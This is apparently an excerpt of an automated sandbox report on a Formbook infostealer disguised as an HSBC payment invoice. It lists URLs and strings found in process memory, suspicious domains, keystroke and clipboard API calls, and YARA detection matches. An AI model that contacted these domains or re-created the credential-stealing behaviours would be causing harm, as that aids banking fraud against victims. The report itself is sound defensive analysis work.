            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_46.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_50.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_51.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_52.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_54.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_56.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_61.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_65.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_66.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_68.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_70.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_72.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_77.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_78.html
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_8.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_80.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/post/1_90.html
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/redian/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/shishang/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/favicon.ico
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/animate.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/style.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/css/swiper.min.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/common.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/fancybox.umd.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html2canvas.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/html5shiv.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery-2.2.4.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/jquery.lazy.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/swiper.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/js/wow.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/template/zblogres/khuboni/static/picture/202209041662300408955816.png
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/xiuxian/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.zl1l5r.website/yule/
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/zhishi/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1l5r.website/zixun/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zl1wsm.website
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.zloyow.website/
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000003C78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.leisu.com/uploads/allimg/190516/1-1Z51621O53-53.jpg
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rundll32.exe, 0000000B.00000003.1701041630.00000000079B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A5D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://v-cn.vaptcha.com/v3.js
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rundll32.exe, 0000000B.00000003.1705131604.00000000079DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000050E2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lavillitadepapa.com/6qht/?ylT8el=uv
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/?welcome
            Source: rundll32.exe, 0000000B.00000002.3728535943.00000000063EA000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004A9A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.livechat.com/chat-with/14282961/
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00EF425A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EF4458
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EF425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00EF425A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00EE0219
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F0CDAC

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: This is a third-party compiled AutoIt script.0_2_00E83B4C
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1454b69c-e
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_360f294a-f
            Source: initial sampleStatic PE information: Filename: HSBCscancopy-invoice778483-payment87476MT103.exe
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E83633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00E83633
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_00F0C27C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C220 NtdllDialogWndProc_W,0_2_00F0C220
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_00F0C49C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F0C788
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00F0C8EE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0C86D SendMessageW,NtdllDialogWndProc_W,0_2_00F0C86D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CBF9 NtdllDialogWndProc_W,0_2_00F0CBF9
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CBAE NtdllDialogWndProc_W,0_2_00F0CBAE
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CB7F NtdllDialogWndProc_W,0_2_00F0CB7F
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CB50 NtdllDialogWndProc_W,0_2_00F0CB50
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00F0CC2E ClientToScreen,NtdllDialogWndProc_W,0_2_00F0CC2E
